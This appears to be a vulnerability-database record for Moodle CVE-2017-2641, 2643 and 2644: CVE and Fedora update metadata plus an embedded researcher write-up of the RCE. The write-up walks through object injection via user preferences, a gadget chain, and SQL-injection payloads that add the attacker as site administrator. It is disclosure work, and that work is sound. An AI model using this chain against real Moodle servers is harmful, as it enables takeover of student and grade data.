ID FEDORA:D1199604868B Type fedora Reporter Fedora Modified 2017-04-01T17:56:20
Description
Moodle is a course management system (CMS) - a free, Open Source software package designed using sound pedagogical principles, to help educators crea te effective online learning communities.
{"cve": [{"lastseen": "2020-10-03T13:07:42", "description": "In Moodle 3.x, XSS can occur via evidence of prior learning.", "edition": 3, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2017-03-26T18:59:00", "title": "CVE-2017-2644", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2644"], "modified": "2017-07-12T01:29:00", "cpe": ["cpe:/a:moodle:moodle:3.1.0", "cpe:/a:moodle:moodle:3.2.1", "cpe:/a:moodle:moodle:3.2.0", "cpe:/a:moodle:moodle:3.1.1", "cpe:/a:moodle:moodle:3.1.3", "cpe:/a:moodle:moodle:3.1.2", "cpe:/a:moodle:moodle:3.1.4"], "id": "CVE-2017-2644", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2644", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:moodle:moodle:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.2.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.1.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.2.0:beta:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.2.0:rc5:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.2.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.1.0:beta:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T13:07:42", "description": "In Moodle 3.2.x, global search displays user names for unauthenticated users.", "edition": 3, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 1.4}, "published": "2017-03-26T18:59:00", "title": "CVE-2017-2643", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2643"], "modified": "2017-07-12T01:29:00", "cpe": ["cpe:/a:moodle:moodle:3.2.1", "cpe:/a:moodle:moodle:3.2.0"], "id": "CVE-2017-2643", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2643", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:moodle:moodle:3.2.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.2.0:beta:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.2.0:rc5:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.2.0:rc4:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T13:07:42", "description": "In Moodle 2.x and 3.x, SQL injection can occur via user preferences.", "edition": 3, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-26T18:59:00", "title": "CVE-2017-2641", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2641"], "modified": "2017-08-16T01:29:00", "cpe": ["cpe:/a:moodle:moodle:3.0.1", "cpe:/a:moodle:moodle:2.7.17", "cpe:/a:moodle:moodle:3.0.2", "cpe:/a:moodle:moodle:3.0.4", "cpe:/a:moodle:moodle:2.7.12", "cpe:/a:moodle:moodle:2.7.9", "cpe:/a:moodle:moodle:2.7.2", "cpe:/a:moodle:moodle:3.1.0", "cpe:/a:moodle:moodle:2.7.16", "cpe:/a:moodle:moodle:3.2.1", "cpe:/a:moodle:moodle:2.7.18", "cpe:/a:moodle:moodle:2.7.10", "cpe:/a:moodle:moodle:3.0.7", "cpe:/a:moodle:moodle:2.7.0", "cpe:/a:moodle:moodle:3.0.3", "cpe:/a:moodle:moodle:2.7.7", "cpe:/a:moodle:moodle:3.2.0", "cpe:/a:moodle:moodle:2.7.1", "cpe:/a:moodle:moodle:2.7.11", "cpe:/a:moodle:moodle:3.1.1", "cpe:/a:moodle:moodle:2.7.8", "cpe:/a:moodle:moodle:3.0.6", "cpe:/a:moodle:moodle:2.7.13", "cpe:/a:moodle:moodle:3.1.3", "cpe:/a:moodle:moodle:3.1.2", "cpe:/a:moodle:moodle:2.7.5", "cpe:/a:moodle:moodle:2.7.15", "cpe:/a:moodle:moodle:2.7.4", "cpe:/a:moodle:moodle:3.0.0", "cpe:/a:moodle:moodle:2.7.14", "cpe:/a:moodle:moodle:3.0.8", "cpe:/a:moodle:moodle:2.7.3", "cpe:/a:moodle:moodle:3.1.4", "cpe:/a:moodle:moodle:3.0.5", "cpe:/a:moodle:moodle:2.7.6"], "id": "CVE-2017-2641", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2641", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:moodle:moodle:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.18:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.0.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.11:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.16:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.2.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.15:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.8:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.0:beta:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.7:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.1.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.2.0:beta:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.4:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.3:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.0.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.13:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.12:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.17:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.14:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.10:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.6:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.0.0:beta:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.5:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.2.0:rc5:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.2.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.9:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:3.1.0:beta:*:*:*:*:*:*"]}], "fedora": [{"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-2641", "CVE-2017-2643", "CVE-2017-2644"], "description": "Moodle is a course management system (CMS) - a free, Open Source software package designed using sound pedagogical principles, to help educators crea te effective online learning communities. ", "modified": "2017-04-01T00:26:58", "published": "2017-04-01T00:26:58", "id": "FEDORA:905146076D27", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: moodle-3.1.5-1.fc25", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-2641", "CVE-2017-2643", "CVE-2017-2644"], "description": "Moodle is a course management system (CMS) - a free, Open Source software package designed using sound pedagogical principles, to help educators crea te effective online learning communities. ", "modified": "2017-03-31T23:48:47", "published": "2017-03-31T23:48:47", "id": "FEDORA:097FA6075D8D", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: moodle-3.1.5-1.fc24", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T12:00:43", "description": "The vulnerability (CVE-2017-2641) allows an attacker to execute PHP code at the vulnerable Moodle server. This vulnerability actually consists of many small vulnerabilities, as described further in the blog post.\r\n\r\nMoodle is a very popular learning management system, deployed in many universities around the world, including top institutes such as MIT, Stanford, the University of Cambridge, and Oxfords\u2019 University.\r\nThese statistics, along with the fact Moodle stores a lot of sensitive information, such as grades, tests, and students private data, makes it a critical target, and the main reason I audited it.\r\n\r\n\r\n\r\nA user is required to exploit the vulnerability. It does not matter which capabilities it has (i.e. student, teacher) as long as it is not a guest.\r\n\r\nThis vulnerability works on almost all Moodle versions deployed today, as seen in the Vulnerable Versions section.\r\nI recommend all Moodle administrators to apply the [security patch](https://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-58010).\r\n\r\n#### Vulnerable Versions\r\n\r\n\u201c3.2 to 3.2.1, 3.1 to 3.1.4, 3.0 to 3.0.8, 2.7.0 to 2.7.18 and other unsupported versions.\u201d\r\n\r\n#### Technical Description\r\n\r\n**Part 1 \u2013 The Problems of Having Too Much Code**\r\n\r\nMoodle is an extremely large system. It contains thousands of files, hundreds of different components and approximately two million lines of PHP code.\r\nAs such, it is obvious different developers wrote different parts of the code, even if those parts interact with each other.\r\n\r\nIn the following white paper, I will demonstrate how having too much code, too many developers, and lacking documentation can lead to critical logical vulnerabilities.\r\nKeep in mind that logical vulnerabilities can and will occur in almost all systems featuring a large code base. Security issues in large code bases is of course not Moodle specific.\r\n\r\nA clear case of \u201csame feature, different code\u201d can be observed at the built-in Ajax mechanism of the system.\r\n\r\nMoodle is featuring a dynamic Ajax system, which allows different components to use the system\u2019s built-in Ajax interface.\r\nThe way Moodle does that is by using \u201cExternal Functions\u201d. Each component that wishes to use the built-in Ajax mechanism is registering its own \u201cExternal Function\u201d, specifying the component being called, the function name and the privileges required to use it.\r\n\r\nLater, when components wish to use the Ajax interface, they can simply call the _\u201cservice.php\u201d_ file, supplying the name of the external function they have registered earlier.\r\nThat way Moodle is allowing component developers to use its built-in Ajax interface, saving them the trouble of writing a new one by themselves.\r\n\r\nThe problem starts when Moodle\u2019s core developers has started using this interface too.\r\n\r\nNot so long ago, if a component needed to change the user\u2019s preferences through an Ajax request, it called the _\u201csetuserpref.php\u201d_ file, specifying the name and value of the property it wanted to change.\r\nThis can be viewed in the following code:\r\n\r\n```\r\n// Check access.\r\nif (!confirm_sesskey()) {\r\n\tprint_error('invalidsesskey');\r\n}\r\n\r\n// Get the name of the preference to update, and check it is allowed.\r\n$name = required_param('pref', PARAM_RAW);\r\nif (!isset($USER->ajax_updatable_user_prefs[$name])) {\r\n\tprint_error('notallowedtoupdateprefremotely');\r\n}\r\n\r\n// Get and the value.\r\n$value = required_param('value', $USER->ajax_updatable_user_prefs[$name]);\r\n\r\n// Update\r\nif (!set_user_preference($name, $value)) {\r\n\tprint_error('errorsettinguserpref');\r\n}\r\n\r\necho 'OK';\r\n```\r\n\r\nIn the middle of the code, at the highlighted line, we can see that Moodle is trying to make sure the preference that needs to be changed is defined in the \u201c_ajax_updatable_user_prefs\u201d_ array, which defines which preferences can be changed via Ajax.\r\nThis makes a lot of sense as Moodle does not want malicious attackers, such as us, to change anything that could prove to be critical.\r\n\r\nAlthough most of the user preferences can be changed via other measures, even if not through the Ajax interface, Moodle\u2019s developers tried to think ahead and prevented any future abuse of this mechanism.\r\n\r\nThat was true, until the external function \u201c_update_user_preferences\u201d_ has been added.\r\nThis function was added to replace the old \u201c_update_users\u201d_ function, which could \u201cpotentially [be] used to update any user attribute\u201d, which is obviously a very bad thing; and, as the old function was only used to update user\u2019s preferences anyway, there was obviously no need to allow it to change anything else.\r\n\r\nThe main difference between the old function and the new one, is that the old function **could not be accessed through the Ajax interface**, while the new one could, as the supposedly dangerous feature \u2013 the ability to change every user attribute, has been removed.\r\n\r\nOn top of that, they implemented a proper privilege check, so even if an attacker could exploit something using user preferences, it will be able to exploit it only on its own user.\r\nBut that doesn\u2019t really matter if these preferences are later used inside an \u201ceval\u201d or an \u201cexec\u201d call, right? It doesn\u2019t matter which user is exploiting the dangerous function as long as it\u2019s being exploited.\r\n\r\nBut let\u2019s not get ahead of ourselves and have a look at the code of this function:\r\n\r\n```\r\npublic static function update_user_preferences($userid, \u2026, $preferences) { \r\n\t...\r\n\t// If we are trying to edit our own user preferences\r\n\tif ($userid == $USER->id) {\r\n\t\t// Requires the capability to edit our own profile, which we have\r\n\t\trequire_capability('moodle/user:editownmessageprofile', $systemcontext);\r\n\t} else { // Otherwise, we are tring to edit someone else's preferences\r\n\t\t/* Require admin capabilities... */\r\n\t}\r\n\r\n\t// Set the user's preferences. \r\n\tforeach ($preferences as $preference) {\r\n\t\tset_user_preference($preference['type'], $preference['value'], $userid);\r\n\t}\r\n\t...\r\n}\r\n```\r\n\r\nBy looking at the code, we can see that we can only edit our own preferences because of the privileges check.\r\nBut still, something is missing. Although the code makes sure we are only editing our own user preferences, it doesn\u2019t check **which** preference we are changing, contrary to the other Ajax page responsible for changing user preferences \u2013 _\u201csetuserpref.php\u201d_.\r\n\r\nA classic example of how different developers, at different times, with different needs in mind write different code for the exact same functionality.\r\nThis time, they assumed user preferences could not be exploited in any malicious way. They assumed it\u2019s unexploitable.\r\n\r\n**Part 2 \u2013 Exploiting the Unexploitable**\r\n\r\nThere\u2019s a reason user preferences are considered unexploitable. They literally have almost no impact in terms of how to system operates \u2013 they are not used in DB queries, they are not defining any components, and the only thing they somewhat impact is GUI part of the system, and even then, only in a miner way.\r\n\r\nSo, what _can_ we do?\r\nWell, let\u2019s have a look at how the GUI parts of the system function.\r\n\r\nMoodle is using a Blocks mechanism to allow components to display relevant data to the user. These blocks can be added and removed by the user.\r\n\r\nOne of these blocks \u2013 \u201ccourse_overview\u201d, is used to display the user a list of its enrolled courses. In order to store the order of the courses he enrolled into, The Course Overview block mechanism is using a specific user preference called \u201c_course_overview_course_sortorder\u201d_. This preference store a list of all courses IDs the user has enrolled into, ordered by the time he enrolled into them.\r\n\r\nThis list separates the course IDs using a comma, so the following line of code is used to split the list:\r\n\r\n```\r\nreturn explode(',', $value); // Split the IDs using a comma\r\n```\r\n\r\nBut what happens if that preference is empty? In that case, the block mechanism is trying to retrieve the legacy preference, \u201c_course_overview_course_order\u201d_, which again contains a list of all courses IDs, but in a rather different way.\r\nThis time, in order to retrieve to IDs the block mechanism actually executes:\r\n\r\n```\r\n$order = unserialize($value); // Unserialize the course IDs\r\n```\r\n\r\nAn unserialize call. What a surprise.\r\nAnother classic example of how legacy code and backwards compatibility can compromise your entire system if you still use it, and how different developers from different times can implement the exact same feature using completely different ways.\r\n\r\nFor us, this means we can now exploit an Object Injection attack.\r\nUnfortunately, because of the Moodle is filtering user input, there are some limitations about what we can injection:\r\n\r\n1. We cannot inject Null bytes. At all. This means we cannot set any protected or private object properties, because when PHP is serializing them it adds null bytes to their serialized declaration.\r\n2. Although there are a lot of classes in the code base, most of them are unreachable. They are either not included when our payload is unserialized, or cannot be reached using an autoload function.\r\n\r\nThese limitations lead to a pretty difficult Object Injection. Yet, I did write RCE in the title, didn\u2019t I?\r\n\r\n**Part 3 \u2013 Taking the Fun Out of Object Injections**\r\n\r\nBecause of the specified limitations, we can only use public properties of already included classes. We can\u2019t also use any code that relies on any protected or private properties as well, as they will be initialized as their default value or, most of the time, just a NULL.\r\n\r\nThis really narrows our attack surface. Almost all classes use protected properties in some way, and most of them doesn\u2019t feature any public properties at all.\r\n\r\nThe first step is to understand exactly which magic PHP methods we can use.\r\nWe can obviously call \u201c___wakeup()\u201d_, which is called when the object is unserialized, and _\u201c__destruct()\u201d_, which is called when the object is destroyed, but can we call another very popular method \u2013 \u201c___toString()\u201d_?\r\n\r\nWell, if we\u2019ll look at the code that\u2019s being executed right after our payload is unserialized we will see that our unserialized payload is treated as an array:\r\n\r\n```\r\nfunction block_course_overview_update_myorder($sortorder) {\r\n // $sortorder is our unserialized payload.\r\n $value = implode(',', $sortorder);\r\n ...\r\n set_user_preference('course_overview_course_sortorder', $value);\r\n}\r\n```\r\n\r\nThis function tries to join our unserialized array members into one big happy string. But, if one of our members was actually, say, an Object, its _\u201c__toString()\u201d_ method would have been called.\r\n\r\nSo we can not only execute one object\u2019s _\u201c__toString()\u201d_ method, we could execute how many of them as we\u2019d like.\r\n\r\nBut what could we possibly do with a _\u201c__toString()\u201d?_\r\nWell, let\u2019s have a look at how the \u201c_attribute_format_\u201d abstract class implemented its own _\u201c__toString()\u201d_ method:\r\n\r\n```\r\n/**\r\n * Convert this to an element and then to a string\r\n * @return string\r\n */\r\npublic function __toString() {\r\n return $this->determine_format()->html();\r\n}\r\n```\r\n\r\nLooks simple, right? Let\u2019s look at one code flow we can access by calling the _\u201cdetermine_format()\u201d_ method of the class _\u201cfeedback\u201d_, which inherits from our _\u201cattribute_format\u201d_ class:\r\n\r\n```\r\n/**\r\n* Create a text_attribute for this ui element.\r\n*\r\n* @return text_attribute\r\n*/\r\npublic function determine_format() {\r\n return new text_attribute(\r\n $this->get_name(),\r\n $this->get_value(),\r\n $this->get_label(),\r\n $this->is_disabled()\r\n );\r\n}\r\n\r\n/**\r\n* Determine if this input should be disabled based on the other settings.\r\n*\r\n* @return boolean Should this input be disabled when the page loads.\r\n*/\r\npublic function is_disabled() {\r\n ...\r\n if ($this->grade->grade_item->is_overridable_item() \u2026) {\r\n $overridden = 1;\r\n }\r\n \u2026\r\n}\r\n```\r\n\r\nSee that _\u201cis_overridable_item()\u201d_ call? That\u2019s another method call, but this time using one of the object\u2019s properties as an object.\r\nNow we are getting somewhere. Because we control the property, we control the object being called, which really expands our attack surface.\r\nOne of the classes implementing the _\u201cis_overridable_item()\u201d_ method is the _\u201cgrade_item\u201d_ class\r\n\r\nFollowing a series of method calls, we eventually arrive to the _\u201cupdate\u201d_ method:\r\n\r\n```\r\n/**\r\n * Is the grade item overridable\r\n*/\r\npublic function is_overridable_item() {\r\n ...\r\n return ... ($this->is_external_item() or $this->is_calculated() ...);\r\n}\r\n\r\n/**\r\n * Checks if grade calculated. Returns this object's calculation.\r\n*/\r\npublic function is_calculated() {\r\n ...\r\n if (!$this->calculation_normalized and strpos($this->calculation, '[[') !== false) {\r\n $this->set_calculation($this->calculation);\r\n }\r\n ...\r\n}\r\n\r\n/**\r\n * Sets this item's calculation (creates it) if not yet set, or\r\n * updates it if already set (in the DB). If no calculation is given,\r\n * the calculation is removed.\r\n*/\r\npublic function set_calculation($formula) {\r\n ...\r\n $this->calculation_normalized = true;\r\n return $this->update();\r\n}\r\n\r\n/**\r\n * Updates this object in the Database, based on its object variables. ID must be set.\r\n*/\r\npublic function update($source=null) {\r\n ...\r\n\r\n // Get the data to update (IDs, column names, values)\r\n $data = $this->get_record_data();\r\n\r\n // Update the record in the database\r\n $DB->update_record($this->table, $data);\r\n\r\n ...\r\n}\r\n```\r\n\r\nAs can be seen, the _\u201cupdate\u201d_ method is responsible for updating the database with the data stored in the object. It\u2019s using the property \u201c_table\u201d_ as the table name to update and the data is derived straight from the object own properties.\r\n\r\nSo, basically, that\u2019s a win. Using our object injection, we could update any row we\u2019d like in the entire database. We could update administrator accounts, passwords, the site configuration, and basically whatever we want.\r\n\r\nThat being said, there are a few limitations of how we can update:\r\n\r\n1. The update SQL statement always ends with a WHERE condition, checking for an ID we specify it.\r\n2. We cannot exploit SQL injections in our data. The values we are setting are escaped and the fields we are updating are checked against the actual fields of the table, so we can\u2019t use any field that isn\u2019t already there.\r\n\r\nBut why do we even care about SQL Injections? We can already update whatever we want. Right?\r\n\r\n**Wrong.** We can update everything we\u2019d like as long as we know **the ID of the row** we want to update.\r\nSo, if for example we are trying to update the administrator\u2019s password, we either need to guess its user ID, or just brute-force every account in the database. And as we are 1337 h4x0rs, we are trying to minimize the impact on the server as much as possible.\r\n\r\n**Part 4 \u2013 1337 H4x0rs**\r\n\r\nSo, first, we don\u2019t want to start changing passwords for every user in the system. In fact, we don\u2019t want to change anyone\u2019s password, as this will probably be pretty suspicious.\r\nIn order to bypass that we could add our user as another administrator in the system by changing the \u201c_site_admins\u201d_ configuration value, stored in the _\u201cconfig\u201d_ table.\r\n\r\nBut how can we guess the ID of that specific configuration in the table?\r\nWell, we can\u2019t. But we can try to change the WHERE SQL statement somehow.\r\n\r\nTo do that, we will need to use an SQL Injection after all. As we can\u2019t exploit any of the data fields, we will have to inject our SQL in the table name itself, which is not being escaped anywhere.\r\n\r\nBut that raises another problem \u2013 before the UPDATE statement is executed, Moodle is querying the database for the column names and types of our specified table.\r\n\r\nThis means we will have to make the same SQL Injection work both on the SELECT statement, which should return the correct data for the table, and the UPDATE statement, which should update the _\u201csite_admins\u201d_ configuration value.\r\n\r\nLet\u2019s have a look at both statements:\r\n\r\n```\r\nSELECT column_name, data_type, character_maximum_length, numeric_precision,\r\n\tnumeric_scale, is_nullable, column_type, \r\n\tcolumn_default, column_key, extra\r\nFROM information_schema.columns\r\nWHERE table_name = '[TABLE_NAME]'\r\nORDER BY ordinal_position\r\n```\r\n\r\n```\r\nUPDATE [TABLE_NAME] SET [DATA] WHERE WHERE id='[ID]'\r\n```\r\n\r\nIt is clear the only injection point we have in both tables is the table name.\r\n\r\nOne way to exploit this SQL Injection is by starting a multiline comment (/*) after the table we wish to update, and close it in one of our data parameters. That way our data could contain our altered WHERE statement, filtering the data by the configuration name instead of its ID.\r\nSo, our payload thus far looks like this:\r\n\r\n```\r\nSELECT \u2026 WHERE table_name = 'config' /*'\r\nORDER BY ordinal_position\r\n```\r\n\r\n```\r\nUPDATE config' /* SET field='*/ SET value=our_user_id WHERE name=site_admins-- WHERE id='[ID]'\r\n```\r\n\r\nBut how can we insert a comment in the table name and still make both the SELECT statement and UPDATE statement to work?\r\nClearly, the UPDATE statement will not work because of the added apostrophe after the table name, and the select statement will not work because we can\u2019t open a multiline comment without closing it in SQL.\r\n\r\nWhat happens if we will insert the multiline comment into our table name without closing the string, and then just continue the WHERE condition using another OR statement?\r\nI mean, something like this:\r\n\r\n```\r\nSELECT \u2026 WHERE table_name = 'config /*' or table_name LIKE '%config'\r\nORDER BY ordinal_position\r\n```\r\n\r\n```\r\nUPDATE config /*' or table_name LIKE '%config SET field='*/ SET value=our_user_id WHERE name=site_admins-- WHERE id='[ID]'\r\n```\r\n\r\nWhile the SELECT statement is pretty much self-explanatory, the UPDATE statement probably needs a bit more explanation.\r\nAllow me to display it the way MySQL will parse it:\r\n\r\n```\r\nUPDATE config /*' or table_name LIKE '%config SET field='*/ SET value=our_user_id WHERE name=site_admins -- WHERE id='[ID]'\r\n```\r\n\r\nAs you can now clearly see, we\u2019ve commented out everything between the table name and the first data value we control. That way, we can use SQL statements only on the UPDATE statement, without effecting the SELECT statement.\r\n\r\nWe then just set the configuration value to whatever we want, preferably our user ID, and then just add our improved WHERE statement, filtering the table based on the configuration name. Finally, we add a single-line comment in order to remove the built-in WHERE statement, and that\u2019s it. We successfully exploiting the same SQL Injection on two different queries.\r\n\r\nSo, all we have to do now is wait for the configuration cache to refresh, which should happen every day or so, or just force refresh it ourselves by removing the configuration value of \u201callversionshash\u201d, which stores a SHA-1 hash of all the core files in the system. Changing the value of this configuration will make Moodle think it went through a firmware update and just refresh the entire cache for us.\r\n\r\nAfter gaining full administrator privileges executing code is as simple as uploading a new plugin or template to the server.\r\n\r\nSo, after exploiting some false assumptions, an Object Injection, a double SQL Injection and a permissive Administrator dashboard, we finally won. **We executed code on the server.**", "published": "2017-03-21T00:00:00", "type": "seebug", "title": "Moodle Remote Code Execution Vulnerability (CVE-2017-2641)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-2641"], "modified": "2017-03-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92807", "id": "SSV:92807", "sourceData": "", "cvss": {"score": 7.5, "vector": 